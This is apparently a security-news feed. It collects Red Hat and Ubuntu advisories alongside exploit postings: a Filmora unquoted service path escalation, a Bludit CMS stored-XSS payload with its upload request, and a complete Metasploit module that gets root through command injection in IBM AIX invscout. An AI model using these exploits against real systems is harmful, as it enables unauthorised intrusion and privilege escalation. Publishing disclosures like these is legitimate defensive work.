Red Hat Security Advisory 2023-3229-01 - An update for openshift-gitops-kam is now available for Red Hat OpenShift GitOps 1.8. Red Hat Product Security has rated this update as having a security impact of Important. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: openshift-gitops-kam security update  
Advisory ID:       RHSA-2023:3229-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3229  
Issue date:        2023-05-18  
CVE Names:         CVE-2022-1996   
=====================================================================

1. Summary:

An update for openshift-gitops-kam is now available for Red Hat OpenShift  
GitOps 1.8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift GitOps 1.8 - aarch64, ppc64le, s390x, x86_64

3. Description:

Security Fix(es):

* go-restful: Authorization Bypass Through User-Controlled Key  
(CVE-2022-1996)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2094982 - CVE-2022-1996 go-restful: Authorization Bypass Through User-Controlled Key

6. Package List:

Red Hat OpenShift GitOps 1.8:

Source:  
openshift-gitops-kam-1.8.3-6.el8.src.rpm

aarch64:  
openshift-gitops-kam-1.8.3-6.el8.aarch64.rpm

ppc64le:  
openshift-gitops-kam-1.8.3-6.el8.ppc64le.rpm

s390x:  
openshift-gitops-kam-1.8.3-6.el8.s390x.rpm

x86_64:  
openshift-gitops-kam-1.8.3-6.el8.x86_64.rpm  
openshift-gitops-kam-redistributable-1.8.3-6.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1996  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/latest/cicd/gitops/understanding-openshift-gitops.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGa7PNzjgjWX9erEAQheAxAAi8ht7PJT/ROGK79wue83Kensu6/1iOJJ  
hyhvbJCSyphlyGUl9PBjTrpCU3/TjUuftPFFUkl3r+98ru8R/ev2WDbV2afd32B6  
r3dyT41+qGhHxbwWP5il5amK6zyNfQJu1KV70GeGALID32712NjltGlESQOIC8NY  
4/UdNRz1TdQywkhKsuuSJD5O0PWrwuRY+3tmBf8+/RRcVGYVZN9Q4e9EwBPcXrh3  
eHID1oq/K8sWayzFiQ9C1Mi6NcfnHJrcn9lJvlAvZWVUE4L8zn5uXLGqtAW2dNss  
+Ru9GJIfO5h6caueVAmg3iVCkef0VI8uDGQASsbi1w+wwAa+6f9witZgyK/PLI02  
2Z4I6F2m2y+j0iYsOhxtO2G3KqGANpHGvt8DZiTdafIqlzZEFS+TqE2eLHY3cHGK  
/IgsXXUNhHqP1he82AR6XWDLHyBEHNIJ7pYTdprr+bjuxhDXSLY7oxcsLp0m/5kK  
A9NLGXCHcsofhWYGqryTG4pPqEcO2cphgIa5HfMrNdpucGYwx7ZnZKCvrnfVHH0S  
cdDilsWy+W9QN/T5hzGAU3EsGxNIVVYBseSO6XN56Ohy8LmwRUmZpOczGJkwzbMJ  
DesMBYtNiAlkPgknmbQY1pF4d++qZkXm5eQX1lGX5PwKNyqTn9BP9tv1SLCe5EGo  
6b9Cdmg6Wes=  
=rsKr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3229-01

Filmora version 12 Build 1.0.0.7 suffers from an unquoted service path vulnerability.

Vendor Name: Filmora  
Product Name: Filmora 12 version ( Build 1.0.0.7 )  
Vendor Home Page:  https://filmora.wondershare.com/  
Affected Version(s): Filmora 12 version (Build 12.2.1.2088)  
Vulnerability Type: Unquoted Service Path Vulnerability (CWE-428)  
CVE Reference: CVE-2023-31747  
Security Researcher: Thurein Soe

Vulnerability description:  
Filmora is professional video editing software. Wondershare NativePush  
Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088) Wondershare  
NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The  
service name "NativePushService" was vulnerable to unquoted service paths  
vulnerability which led to full local privilege escalation in the affected  
system as the service "NativePushService" was running as a system  
privilege. Effectively, the local user is able to elevate to local admin.

C:\>sc qc NativePushService  
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NativePushService  
        TYPE               : 10  WIN32_OWN_PROCESS  
        START_TYPE         : 2   AUTO_START  
        ERROR_CONTROL      : 1   NORMAL  
        BINARY_PATH_NAME   :  
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare  
NativePush\WsNativePushService.exe  
        LOAD_ORDER_GROUP   :  
        TAG                : 0  
        DISPLAY_NAME       : Wondershare Native Push Service  
        DEPENDENCIES       :  
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare  
NativePush\WsNativePushService.exe"

C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare  
NativePush\WsNativePushService.exe

BUILTIN\Users:(ID)F

                    NT AUTHORITY\SYSTEM:(ID)F

                    BUILTIN\Administrators:(ID)F

                    HNINKAYTHAYAR\HninKayThayar:(ID)F

Filmora 12 Build 1.0.0.7 Unquoted Service Path

Ubuntu Security Notice 6090-1 - It was discovered that some AMD x86-64 processors with SMT enabled could speculatively execute instructions using a return address from a sibling thread. A local attacker could possibly use this to expose sensitive information. Zheng Wang discovered that the Intel i915 graphics driver in the Linux kernel did not properly handle certain error conditions, leading to a double-free. A local attacker could possibly use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6090-1  
May 18, 2023

linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop,  
linux-oracle-5.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems  
- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems  
- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-gke-5.15: Linux kernel for Google Container Engine (GKE) systems  
- linux-oracle-5.15: Linux kernel for Oracle Cloud systems

Details:

It was discovered that some AMD x86-64 processors with SMT enabled could  
speculatively execute instructions using a return address from a sibling  
thread. A local attacker could possibly use this to expose sensitive  
information. (CVE-2022-27672)

Zheng Wang discovered that the Intel i915 graphics driver in the Linux  
kernel did not properly handle certain error conditions, leading to a  
double-free. A local attacker could possibly use this to cause a denial of  
service (system crash). (CVE-2022-3707)

Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did  
not properly implement speculative execution barriers in usercopy functions  
in certain situations. A local attacker could use this to expose sensitive  
information (kernel memory). (CVE-2023-0459)

It was discovered that the TLS subsystem in the Linux kernel contained a  
type confusion vulnerability in some situations. A local attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2023-1075)

It was discovered that the Reliable Datagram Sockets (RDS) protocol  
implementation in the Linux kernel contained a type confusion vulnerability  
in some situations. An attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1078)

Xingyuan Mo discovered that the x86 KVM implementation in the Linux kernel  
did not properly initialize some data structures. A local attacker could  
use this to expose sensitive information (kernel memory). (CVE-2023-1513)

It was discovered that the Android Binder IPC subsystem in the Linux kernel  
did not properly validate inputs in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-20938)

It was discovered that a use-after-free vulnerability existed in the iSCSI  
TCP implementation in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2023-2162)

It was discovered that the NET/ROM protocol implementation in the Linux  
kernel contained a race condition in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-32269)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1020-gkeop   5.15.0-1020.25  
   linux-image-5.15.0-1033-gke     5.15.0-1033.38  
   linux-image-5.15.0-1034-gcp     5.15.0-1034.42+1  
   linux-image-gcp-lts-22.04       5.15.0.1034.30  
   linux-image-gke                 5.15.0.1033.32  
   linux-image-gke-5.15            5.15.0.1033.32  
   linux-image-gkeop               5.15.0.1020.19  
   linux-image-gkeop-5.15          5.15.0.1020.19

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1033-gcp     5.15.0-1033.41~20.04.1  
   linux-image-5.15.0-1033-gke     5.15.0-1033.38~20.04.1  
   linux-image-5.15.0-1035-oracle  5.15.0-1035.41~20.04.1  
   linux-image-gcp                 5.15.0.1033.41~20.04.1  
   linux-image-gke-5.15            5.15.0.1033.38~20.04.1  
   linux-image-oracle              5.15.0.1035.41~20.04.1

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6090-1  
   CVE-2022-27672, CVE-2022-3707, CVE-2023-0459, CVE-2023-1075,  
   CVE-2023-1078, CVE-2023-1118, CVE-2023-1513, CVE-2023-20938,  
   CVE-2023-2162, CVE-2023-32269

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1034.42  
   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1033.38  
   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1020.25  
   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1033.41~20.04.1  
   https://launchpad.net/ubuntu/+source/linux-gke-5.15/5.15.0-1033.38~20.04.1

 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1035.41~20.04.1

Ubuntu Security Notice USN-6090-1

Bludit CMS version 3.14.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS)(Authenticated)# Date: 2023-04-15# Exploit Author: Rahad Chowdhury# Vendor Homepage: https://www.bludit.com/# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1# Version: 3.14.1# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-31698SVG Payload-------------<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>save this SVG file xss.svgSteps to Reproduce:1. At first login your admin panel.2. then go to setting and click logo section.3. Now upload xss.svg file so your request data will bePOST /bludit/admin/ajax/logo-upload HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/112.0Content-Type: multipart/form-data;boundary=---------------------------15560729415644048492005010998Referer: http://127.0.0.1/bludit/admin/settingsCookie: BLUDITREMEMBERUSERNAME=admin;BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74iContent-Length: 651-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="tokenCSRF"626c201693546f472cdfc11bed0938aab8c6e480-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="inputFile"; filename="xss.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>-----------------------------15560729415644048492005010998--4. Now open logo image link that you upload. You will see XSS pop up.

Bludit CMS 3.14.1 Cross Site Scripting

Ubuntu Security Notice 6089-1 - It was discovered that the Intel i915 graphics driver in the Linux kernel did not perform a GPU TLB flush in some situations. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6089-1May 18, 2023linux-oem-6.0 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The system could be made to crash or run programs as an administrator.Software Description:- linux-oem-6.0: Linux kernel for OEM systemsDetails:It was discovered that the Intel i915 graphics driver in the Linux kerneldid not perform a GPU TLB flush in some situations. A local attacker coulduse this to cause a denial of service or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.0.0-1016-oem      6.0.0-1016.16   linux-image-oem-22.04b          6.0.0.1016.16After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6089-1   CVE-2022-4139Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.0/6.0.0-1016.16

Ubuntu Security Notice USN-6089-1

Red Hat Security Advisory 2023-0584-01 - Secondary Scheduler Operator for Red Hat OpenShift 1.1.1. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Secondary Scheduler Operator for Red Hat OpenShift 1.1.1 security update  
Advisory ID:       RHSA-2023:0584-01  
Product:           OSSO  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0584  
Issue date:        2023-05-18  
CVE Names:         CVE-2021-46848 CVE-2022-1304 CVE-2022-1586   
                   CVE-2022-2880 CVE-2022-4304 CVE-2022-4415   
                   CVE-2022-4450 CVE-2022-22624 CVE-2022-22628   
                   CVE-2022-22629 CVE-2022-22662 CVE-2022-26700   
                   CVE-2022-26709 CVE-2022-26710 CVE-2022-26716   
                   CVE-2022-26717 CVE-2022-26719 CVE-2022-27664   
                   CVE-2022-30293 CVE-2022-32189 CVE-2022-32190   
                   CVE-2022-34903 CVE-2022-35737 CVE-2022-40303   
                   CVE-2022-40304 CVE-2022-41715 CVE-2022-41717   
                   CVE-2022-41724 CVE-2022-41725 CVE-2022-42898   
                   CVE-2022-47629 CVE-2023-0215 CVE-2023-0286   
                   CVE-2023-0361 CVE-2023-23916   
=====================================================================

1. Summary:

Secondary Scheduler Operator for Red Hat OpenShift 1.1.1

Red Hat Product Security has rated this update as having a security impact  
of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives  
a  
detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

2. Description:

Secondary Scheduler Operator for Red Hat OpenShift 1.1.1

Security Fix(es):

* golang: net/http/httputil: ReverseProxy should not forward unparseable  
query parameters (CVE-2022-2880)  
* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)  
* golang: net/url: JoinPath does not strip relative path components in all  
circumstances (CVE-2022-32190)  
* golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)  
* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)  
* golang: crypto/tls: large handshake records may cause panics  
(CVE-2022-41724)  
* golang: net/http, mime/multipart: denial of service from excessive  
resource consumption (CVE-2022-41725)  
* golang: math/big: decoding big.Float and big.Rat types can panic if the  
encoded message is too short, potentially allowing a denial of service  
(CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

3. Solution:

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service  
2124668 - CVE-2022-32190 golang: net/url: JoinPath does not strip relative path components in all circumstances  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY  
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2161274 - CVE-2022-41717 golang: net/http: excessive memory growth in a Go server accepting HTTP/2 requests  
2178488 - CVE-2022-41725 golang: net/http, mime/multipart: denial of service from excessive resource consumption  
2178492 - CVE-2022-41724 golang: crypto/tls: large handshake records may cause panics

5. JIRA issues fixed (https://issues.jboss.org/):

WRKLDS-653 - New SSO 1.1.1 release to address existing CVEs

6. References:

https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-1304  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-22624  
https://access.redhat.com/security/cve/CVE-2022-22628  
https://access.redhat.com/security/cve/CVE-2022-22629  
https://access.redhat.com/security/cve/CVE-2022-22662  
https://access.redhat.com/security/cve/CVE-2022-26700  
https://access.redhat.com/security/cve/CVE-2022-26709  
https://access.redhat.com/security/cve/CVE-2022-26710  
https://access.redhat.com/security/cve/CVE-2022-26716  
https://access.redhat.com/security/cve/CVE-2022-26717  
https://access.redhat.com/security/cve/CVE-2022-26719  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-30293  
https://access.redhat.com/security/cve/CVE-2022-32189  
https://access.redhat.com/security/cve/CVE-2022-32190  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-41724  
https://access.redhat.com/security/cve/CVE-2022-41725  
https://access.redhat.com/security/cve/CVE-2022-42898  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGa599zjgjWX9erEAQhr4A/+Ki9SxUDxWnm1pb4AEOxtHInGixGrqqsu  
xXRmwFcqSYJfXKYmr4Cwkcf5oVlDObHfKhcLqpFm4r1jOF37vMNfI3nrGSVaQ1dc  
bcqExxXWUPZQHBj25a6oKZx5To87fYrV7axeaeuYh+E2ktT1yEr619zCVlqisw1T  
nB/RdchGNEjZk9galUH63fzdZVQ3pbvaVBkOgTez5D9CK7Dw/PADAcTgKvFMa9Qk  
NBqihu0JemHi0wzCfIC/ozskEqdyE15Ut8pCywlD860VGSURR2T3zTzYATSmzzBK  
+EeI0P6/g7qWMBO7ldXlE22JriK5t97rY2EIR8bX9uiKrIVtppkpclxx76/QceMR  
zFFuh89SZLNhXLBZbtukLVhSudIecKHB+ytbYsY5YWaxcOuyj4/27odSCT8ftwkY  
QhzERjurqMJKS6k4JqfcAvJgsmIM1+f6Ct6XCgFcl4oj6pYYGaSk7IUOYtLdmj6u  
kNyW0C8HCmBST4lNrSmaj61+lgt4w6vA/398iS3R2QqHRdyffsA9w/zXHN9sEXOn  
OrD0RAA6+9wNq818HmKeZB5GDc0d9UOPCxfMepfUXahqKeTTDlKikzpUlrQ4l5c2  
MlI6MgX8rTc+DwZnNCZ3r3MWWtSutmVuZ4fFrDv60GrDpMnMqt1XUawSIAvDcYuv  
5jEpoBq/I5k=  
=Ryg7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0584-01

Red Hat Security Advisory 2023-3195-01 - Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron. Issues addressed include bypass, cross site scripting, information leakage, and insecure permissions vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: jenkins and jenkins-2-plugins security update  
Advisory ID:       RHSA-2023:3195-01  
Product:           OpenShift Developer Tools and Services  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3195  
Issue date:        2023-05-17  
CVE Names:         CVE-2022-42889 CVE-2023-24422 CVE-2023-25761   
                   CVE-2023-25762 CVE-2023-27903 CVE-2023-27904   
=====================================================================

1. Summary:

An update for jenkins and jenkins-2-plugins is now available for OpenShift  
Developer Tools and Services for OCP 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

OpenShift Developer Tools and Services for OCP 4.12 for RHEL 8 - noarch

3. Description:

Jenkins is a continuous integration server that monitors executions of  
repeated jobs, such as building a software project or jobs run by cron.

Security Fix(es):

* apache-commons-text: variable interpolation RCE (CVE-2022-42889)

* jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script  
Security Plugin (CVE-2023-24422)

* jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin  
(CVE-2023-25761)

* jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in  
Pipeline: Build Step Plugin (CVE-2023-25762)

* Jenkins: Temporary file parameter created with insecure permissions  
(CVE-2023-27903)

* Jenkins: Information disclosure through error stack traces related to  
agents (CVE-2023-27904)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE  
2164278 - CVE-2023-24422 jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin  
2170039 - CVE-2023-25761 jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin  
2170041 - CVE-2023-25762 jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin  
2177632 - CVE-2023-27903 Jenkins: Temporary file parameter created with insecure permissions  
2177634 - CVE-2023-27904 Jenkins: Information disclosure through error stack traces related to agents

6. Package List:

OpenShift Developer Tools and Services for OCP 4.12 for RHEL 8:

Source:  
jenkins-2-plugins-4.12.1683009955-1.el8.src.rpm  
jenkins-2.387.1.1683009767-3.el8.src.rpm

noarch:  
jenkins-2-plugins-4.12.1683009955-1.el8.noarch.rpm  
jenkins-2.387.1.1683009767-3.el8.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42889  
https://access.redhat.com/security/cve/CVE-2023-24422  
https://access.redhat.com/security/cve/CVE-2023-25761  
https://access.redhat.com/security/cve/CVE-2023-25762  
https://access.redhat.com/security/cve/CVE-2023-27903  
https://access.redhat.com/security/cve/CVE-2023-27904  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.12/cicd/jenkins/important-changes-to-openshift-jenkins-images.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGa58dzjgjWX9erEAQip9w//UBL/dt2vE4XpmSQJfp6gkUvPQjdbUAmH  
nuozjZ+73t1bqA98GRVo6zpccPHTpzoN43SMYTcWbl49MAuSrSAXNTYO5L1RO97w  
B0RffO+yyfejfXnt/QsJzvCWEKWuICrOVzEry3iDpWjwU2tZT8K6cS/JeE0JuyDp  
OoZDHq2t7ke0Ew/tqiXXlafPI43ZSz93GdJ66bGXCmeCAFxOLj1V5Otn4j88RPVg  
PVgdcUGH4kCT0k0DN43gPN60hNRQh32Y9D6TKtgC/8AwJp3Vv+qOSM5rhCsLzh24  
dpZHwGKGUARP976MNxmcwea74CYnhnjwZhUgQTCsTpPF3iMxw23Lv7W4M454DsSR  
qEiGqjY1RXM9iz6Cd05HCFS8UdWN46T2f02IEjOWpFDLqYueP8AtngWVBlHhZIq6  
1P1/MqTAXrQ2DXL2JooBkyK3LSOkN0HVebSw4mIEitmgEM5wcgskJOYC/y9+fUxb  
38SJQF/hqpZrl+uuQD7bZYnQrzHf9wHJq7wMOsTGHcc1pdPKY6TEV2H0QHb45uNS  
mn3uEzPKjJ0qU3IBOFKm4aoaC+cJ1WynZdlDwhAEwMU3PxtcSpEZCUS1d1omgBvd  
fssRVi6M0wQWgyorIiCSfgiwt7mkt0w+49DhkwiFzmdEPPT6lwzAAm/Up/nwmJuB  
p+xANTbizJ0=  
=8o2E  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3195-01

This Metasploit module exploits a command injection vulnerability in IBM AIX invscout set-uid root utility present in AIX 7.2 and earlier. The undocumented -rpm argument can be used to install an RPM file; and the undocumented -o argument passes arguments to the rpm utility without validation, leading to command injection with effective-uid root privileges. This module has been tested successfully on AIX 7.2.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::File  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'invscout RPM Privilege Escalation',        'Description' => %q{          This module exploits a command injection vulnerability in IBM AIX          invscout set-uid root utility present in AIX 7.2 and earlier.          The undocumented -rpm argument can be used to install an RPM file;          and the undocumented -o argument passes arguments to the rpm utility          without validation, leading to command injection with effective-uid          root privileges.          This module has been tested successfully on AIX 7.2.        },        'Author' => [          'Tim Brown', # Discovery and PoC          'bcoles' # Metasploit        ],        'References' => [          ['CVE', '2023-28528'],          ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],        ],        'Platform' => %w[unix aix],        'Arch' => ARCH_CMD,        'Payload' => {          'BadChars' => "\x00\x0a\x0d\x22",          'Compat' => {            'PayloadType' => 'cmd',            'RequiredCmd' => 'generic telnet openssl'          }        },        'DefaultOptions' => {          'PrependSetresuid' => true,          'PrependSetresgid' => true,          'PrependFork' => true        },        'SessionTypes' => %w[shell meterpreter],        'Targets' => [['Automatic', {}]],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-04-24',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])    ])  end  def invscout_path    datastore['INVSCOUT_PATH']  end  def check    return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)    res = execute_command('id')    id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s    return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')    CheckCode::Vulnerable("Output: #{id}")  end  def execute_command(cmd, _opts = {})    rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"    rpm_args = "; #{cmd}; echo "    res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")    vprint_line(res) unless res.blank?    res  end  def exploit    execute_command(payload.encoded)  endend

IBM AIX 7.2 inscout Privilege Escalation

On May 11 2023, Essential Addons for Elementor, a WordPress plugin with over one million active installations, released a patch for a critical vulnerability that made it possible for any unauthenticated user to reset arbitrary user passwords, including user accounts with administrative-level access. Versions 5.7.1 and below are affected.

